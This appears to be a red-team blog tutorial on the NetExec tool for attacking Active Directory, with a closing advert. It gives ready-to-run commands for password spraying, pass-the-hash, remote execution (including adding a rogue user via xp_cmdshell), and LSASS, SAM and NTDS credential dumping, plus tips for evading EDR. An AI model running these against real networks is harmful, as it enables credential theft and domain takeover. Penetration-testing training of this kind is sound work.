CrackMapExec is dead. Long live NetExec.

If you’ve been in offensive security for more than a few years, CrackMapExec (CME) was probably one of the first tools you learned. It became the go-to for Active Directory enumeration, credential testing, and lateral movement — packed into a single framework with clean output and a protocol-agnostic design.

In 2023, the original author archived the project. The community forked it and kept building under a new name: NetExec (nxc). Same DNA, actively maintained, and compatible with everything CME could do.

This guide covers it all: installation, every major protocol, credential attacks, lateral movement, and how to integrate NetExec into a real-world red team engagement in 2026.


What Is NetExec?

NetExec is a Swiss Army knife for Active Directory offensive operations. It lets you:

  • Enumerate hosts, users, shares, policies across SMB, LDAP, WinRM, MSSQL, RDP, SSH, FTP, and more
  • Test credentials across large networks efficiently
  • Execute commands remotely with valid credentials
  • Dump SAM, LSA, NTDS, and other credential stores
  • Perform pass-the-hash and pass-the-ticket attacks
  • Map attack paths across entire domains

It’s built in Python, runs on Linux, and outputs clean color-coded results. Green means success. Red means failure. Yellow is typically informational. Once you learn the output pattern, you can process results from hundreds of hosts fast.

GitHub: https://github.com/Pennyw0rth/NetExec


Installation

sudo apt update && sudo apt install -y pipx
pipx install netexec
pipx ensurepath

Restart your shell or source your profile, then verify:

nxc --version

From source

git clone https://github.com/Pennyw0rth/NetExec
cd NetExec
pip install .
nxc --version

Kali Linux (apt)

sudo apt update
sudo apt install netexec

Kali’s package may lag behind the latest release. For active engagements, use pipx to stay current.


Core Concepts

Before diving into protocols, understand NetExec’s command structure:

nxc <protocol> <target(s)> [options]

Protocols: smb, ldap, winrm, mssql, rdp, ssh, ftp, vnc, wmi

Target formats:

nxc smb 192.168.1.10          # Single host
nxc smb 192.168.1.0/24        # Subnet
nxc smb 192.168.1.1-50        # Range
nxc smb targets.txt           # File of targets

Credential formats:

-u username -p password           # Plaintext
-u username -H NTLM_HASH         # Pass-the-hash
-u users.txt -p 'Password123'    # User list spray
-u users.txt -p passwords.txt    # Credential stuffing
--no-bruteforce                   # Pair user:pass (same index)

SMB — The Core Protocol

SMB is where most AD engagements start. NetExec makes it painless.

Host discovery and OS fingerprinting

nxc smb 192.168.1.0/24

This gives you hostname, OS version, domain, SMB signing status — no credentials required. SMB signing disabled means relay attacks are viable.

Null session enumeration

nxc smb 192.168.1.10 -u '' -p '' --shares
nxc smb 192.168.1.10 -u '' -p '' --users
nxc smb 192.168.1.10 -u '' -p '' --groups

Some environments allow guest or null sessions. Always check.

Validate credentials

nxc smb 192.168.1.0/24 -u administrator -p 'Summer2026!'

Green [+] means valid. (Pwn3d!) means local admin. That’s the money shot.

Enumerate shares

nxc smb 192.168.1.10 -u jsmith -p 'Password1' --shares

Look for non-default shares: SYSVOL has GPO data, NETLOGON has scripts, and custom shares often have sensitive files.

Spider shares for interesting files

nxc smb 192.168.1.10 -u jsmith -p 'Password1' -M spider_plus
nxc smb 192.168.1.10 -u jsmith -p 'Password1' -M spider_plus -o READ_ONLY=false

spider_plus recursively indexes shares. Add -o READ_ONLY=false to download files directly.

List logged-on users

nxc smb 192.168.1.10 -u jsmith -p 'Password1' --loggedon-users

Shows who’s currently logged in. Key for finding session targets — if a DA is logged onto a workstation, that’s your path.

Enumerate domain users from SMB

nxc smb 192.168.1.10 -u jsmith -p 'Password1' --users

Password Spraying

Password spraying is testing one (or a few) passwords against many users. Low lockout risk if done correctly.

Single password spray

nxc smb 192.168.1.0/24 -u users.txt -p 'Summer2026!' --continue-on-success

--continue-on-success keeps going after a hit — essential for sprays.

Check lockout policy first

nxc smb 192.168.1.10 -u jsmith -p 'Password1' --pass-pol

Always check the domain password policy before spraying. Know the lockout threshold and observation window.

Smart spray timing

If the policy locks after 5 attempts in 30 minutes, space sprays at least 31 minutes apart. A common cadence:

  1. Spray attempt 1 → wait 31 minutes
  2. Spray attempt 2 → wait 31 minutes
  3. Continue…

Multiple passwords without brute force

# Test user1:pass1, user2:pass2 (no cross-matching)
nxc smb 192.168.1.10 -u users.txt -p passwords.txt --no-bruteforce --continue-on-success

Pass-the-Hash

No plaintext password? No problem. NTLM hashes work directly.

nxc smb 192.168.1.0/24 -u administrator -H aad3b435b51404eeaad3b435b51404ee:32ed87bdb5fdc5e9cba88547376818d4

The hash format is LM:NT. For modern systems, LM is disabled — use aad3b435b51404eeaad3b435b51404ee (empty LM hash) plus the actual NT hash.

Check for local admin reuse across subnet

nxc smb 192.168.1.0/24 -u administrator -H <NT_HASH> --local-auth

--local-auth tests against local accounts instead of domain accounts. This is the classic local admin reuse check — if the same local admin hash works on 40 machines, you have lateral movement everywhere.


Remote Execution

Once you have valid credentials and local admin, you can execute commands.

Command execution via SMB

nxc smb 192.168.1.10 -u administrator -p 'Password1' -x "whoami"
nxc smb 192.168.1.10 -u administrator -p 'Password1' -x "net user"
nxc smb 192.168.1.10 -u administrator -p 'Password1' -x "ipconfig /all"

PowerShell execution

nxc smb 192.168.1.10 -u administrator -p 'Password1' -X "Get-Process"
nxc smb 192.168.1.10 -u administrator -p 'Password1' -X "Get-ADUser -Filter * | Select Name,SamAccountName"

Execute across subnet

nxc smb 192.168.1.0/24 -u administrator -p 'Password1' -x "hostname" --no-output

Credential Dumping

This is where NetExec gets dangerous. With local admin, you can pull credential stores.

SAM database (local accounts)

nxc smb 192.168.1.10 -u administrator -p 'Password1' --sam

Dumps local user hashes from the SAM database.

LSA secrets

nxc smb 192.168.1.10 -u administrator -p 'Password1' --lsa

LSA secrets can contain service account credentials, autologon passwords, and cached domain credentials.

LSASS memory (live credentials)

nxc smb 192.168.1.10 -u administrator -p 'Password1' -M lsassy
nxc smb 192.168.1.10 -u administrator -p 'Password1' -M nanodump

These modules extract credentials from LSASS memory. lsassy is the most common. You’ll get NTLM hashes, and in some cases cleartext passwords (Kerberos tickets, WDigest if enabled).

NTDS.dit (domain controller — all domain hashes)

nxc smb 192.168.1.10 -u administrator -p 'Password1' --ntds

Run this against a DC. It dumps the entire NTDS.dit — every domain account hash. This is full domain compromise in a single command.

Run against whole subnet

nxc smb 192.168.1.0/24 -u administrator -H <NT_HASH> --sam --continue-on-success

Dump SAM from every machine where the hash works. Collect unique hashes and start cracking or passing.


LDAP Enumeration

LDAP gives you everything the domain controller knows. With valid domain credentials, it’s a goldmine.

Basic domain info

nxc ldap 192.168.1.10 -u jsmith -p 'Password1' --info

Enumerate users

nxc ldap 192.168.1.10 -u jsmith -p 'Password1' --users

Find AS-REP roastable accounts

nxc ldap 192.168.1.10 -u jsmith -p 'Password1' --asreproast output.txt

Finds accounts with “Do not require Kerberos preauthentication” set. Crack the resulting hashes offline with Hashcat.

Find Kerberoastable accounts

nxc ldap 192.168.1.10 -u jsmith -p 'Password1' --kerberoasting output.txt

Gets TGS tickets for all SPNs. Crack with Hashcat (-m 13100). Service accounts often have weak passwords.

Find users with unconstrained delegation

nxc ldap 192.168.1.10 -u jsmith -p 'Password1' --trusted-for-delegation

Machines or users with unconstrained delegation are high-value targets — any TGT that hits them can be captured.

Password in description field

nxc ldap 192.168.1.10 -u jsmith -p 'Password1' -M get-desc-users

Surprisingly common. Help desk sets a password in the user description field and forgets it.

Find domain admins

nxc ldap 192.168.1.10 -u jsmith -p 'Password1' --groups "Domain Admins"

WinRM

WinRM gives you a PowerShell shell over HTTP(S). If a user is in the Remote Management Users group, you’re in.

nxc winrm 192.168.1.0/24 -u jsmith -p 'Password1'

(Pwn3d!) means WinRM access confirmed. Drop into a shell with Evil-WinRM:

evil-winrm -i 192.168.1.10 -u jsmith -p 'Password1'

Pass-the-hash with WinRM:

nxc winrm 192.168.1.10 -u administrator -H <NT_HASH>
evil-winrm -i 192.168.1.10 -u administrator -H <NT_HASH>

MSSQL

SQL Server is common in enterprise environments and often runs as a privileged service account.

Enumerate SQL servers

nxc mssql 192.168.1.0/24

Authenticate

nxc mssql 192.168.1.10 -u sa -p 'Password1'
nxc mssql 192.168.1.10 -u 'DOMAIN\jsmith' -p 'Password1' --windows-auth

Execute OS commands via xp_cmdshell

nxc mssql 192.168.1.10 -u sa -p 'Password1' -x "whoami"
nxc mssql 192.168.1.10 -u sa -p 'Password1' -x "net user hacker P@ssw0rd /add"

xp_cmdshell runs commands as the SQL service account. If that’s NT AUTHORITY\SYSTEM or a domain service account, the game changes fast.


RDP

nxc rdp 192.168.1.0/24 -u administrator -p 'Password1'

Validates RDP access. Does not open a GUI session. Use xfreerdp or Remmina for interactive access:

xfreerdp /u:administrator /p:'Password1' /v:192.168.1.10

SSH

nxc ssh 192.168.1.0/24 -u root -p 'toor'
nxc ssh 192.168.1.0/24 -u admin -p passwords.txt --continue-on-success

Working With Modules

NetExec has a growing module library. List all available modules:

nxc smb -L
nxc ldap -L
nxc mssql -L

Notable SMB modules

ModuleDescription
lsassyDump LSASS credentials
nanodumpStealthy LSASS dump
spider_plusRecursively index all shares
get_netconnectionsActive network connections
handlekatzLSASS dump via handle duplication
procdumpDump LSASS via procdump
bloodhoundCollect BloodHound data

Notable LDAP modules

ModuleDescription
get-desc-usersFind passwords in description fields
maqMachine account quota
pre2kPre-Windows 2000 compat accounts
adcsEnumerate ADCS (certificate services)

Running a module

nxc smb 192.168.1.10 -u administrator -p 'Password1' -M lsassy
nxc ldap 192.168.1.10 -u jsmith -p 'Password1' -M adcs

Pass module options with -o:

nxc smb 192.168.1.10 -u administrator -p 'Password1' -M spider_plus -o READ_ONLY=false DOWNLOAD_FLAG=true

BloodHound Collection via NetExec

NetExec can collect BloodHound data directly:

nxc ldap 192.168.1.10 -u jsmith -p 'Password1' --bloodhound -ns 192.168.1.10 -c All

This collects users, groups, computers, sessions, ACLs, and trusts — all from a single command. Drop the JSON files into BloodHound for attack path analysis.

See the BloodHound Complete Guide for full analysis workflow.


NetExec Database

Every result NetExec finds goes into a local SQLite database. Query it anytime:

nxc smb --list-hosts           # All discovered hosts
nxc smb --list-creds           # All valid credentials

Or query directly:

nxcdb

The database persists across runs. You can come back to it mid-engagement without re-running everything.


Practical Attack Workflow

Here’s how NetExec fits into a real engagement:

Phase 1: Discovery (no creds)

# Find hosts, OS versions, SMB signing
nxc smb 10.10.10.0/24

# Try null sessions
nxc smb 10.10.10.0/24 -u '' -p '' --shares
nxc smb 10.10.10.0/24 -u '' -p '' --users

Phase 2: Initial foothold

# Check password policy
nxc smb 10.10.10.10 -u '' -p '' --pass-pol

# Password spray (after reviewing policy)
nxc smb 10.10.10.0/24 -u users.txt -p 'Summer2026!' --continue-on-success

Phase 3: Enumerate as domain user

# Map domain
nxc ldap 10.10.10.10 -u jsmith -p 'Summer2026!' --users --groups

# Find attack paths
nxc ldap 10.10.10.10 -u jsmith -p 'Summer2026!' --kerberoasting kerberoast.txt
nxc ldap 10.10.10.10 -u jsmith -p 'Summer2026!' --asreproast asrep.txt
nxc ldap 10.10.10.10 -u jsmith -p 'Summer2026!' --trusted-for-delegation

Phase 4: Lateral movement

# Check local admin across subnet
nxc smb 10.10.10.0/24 -u jsmith -p 'Summer2026!' --local-auth

# Where is admin logged on? Find active sessions
nxc smb 10.10.10.0/24 -u jsmith -p 'Summer2026!' --loggedon-users

# Dump creds where you have admin
nxc smb 10.10.10.10 -u jsmith -p 'Summer2026!' -M lsassy

Phase 5: Domain escalation

# Pass hashes found in lsassy output
nxc smb 10.10.10.0/24 -u administrator -H <HASH> --local-auth

# Hit the DC with NTDS dump
nxc smb 10.10.10.1 -u administrator -p 'Password1' --ntds

Evasion Considerations

NetExec is noisy by default. Event IDs 4624, 4625, 4776 fire on every auth attempt. For stealth-focused engagements:

  • Slow down credential tests. Add sleep between attempts.
  • Avoid mass sprays against EDR-protected hosts. Behavioral detections catch high-volume auth events.
  • Use Kerberos authentication where possible — quieter than NTLM.
  • Limit LSASS interaction. Use modules like nanodump or handlekatz that avoid direct LSASS reads when EDR is present.
  • Stick to LDAP for enumeration over SMB when possible — fewer events, same data.
# Kerberos auth (set /etc/hosts or use --kdcHost)
nxc smb 10.10.10.10 -u jsmith -p 'Password1' --kerberos

CME vs NetExec: What Changed?

If you’re migrating from CrackMapExec:

CrackMapExecNetExec
cmenxc
crackmapexecnetexec
Same modulesExpanded module library
Archived, no updatesActively maintained

Everything else is essentially the same. Commands are nearly identical. Muscle memory transfers.


Practice Lab Setup

You need a real AD lab to practice. Options:

  • Vultr or DigitalOcean — Spin up Windows Server 2022 + client VMs fast. Cheaper than running physical hardware. Get $100 on Vultr →
  • GOAD (Game of Active Directory) — Pre-built vulnerable AD lab you can deploy locally or on a VPS
  • Hack The Box / Pro Labs — Realistic enterprise environments, no setup required

For VPS-based labs, see the VPS vs Home Lab guide .


Summary

NetExec is the living successor to CrackMapExec. If you work in Active Directory environments — offensive or defensive — you need to know this tool cold.

The workflow is consistent: discover hosts, spray credentials carefully, enumerate as a domain user, find privilege escalation paths, and move laterally until you reach the objectives. NetExec does most of the heavy lifting.

It also pairs naturally with BloodHound (for visualizing attack paths) and tools like Impacket, Mimikatz, and Evil-WinRM for execution and persistence. For a full AD attack sequence, see the Active Directory Lateral Movement playbook when it publishes.


Need Professional-Grade Security Content?

If you’re building a security program and need high-quality technical content — blog posts, whitepapers, training materials — check out CipherWrite . Cybersecurity content written by practitioners, not generalists.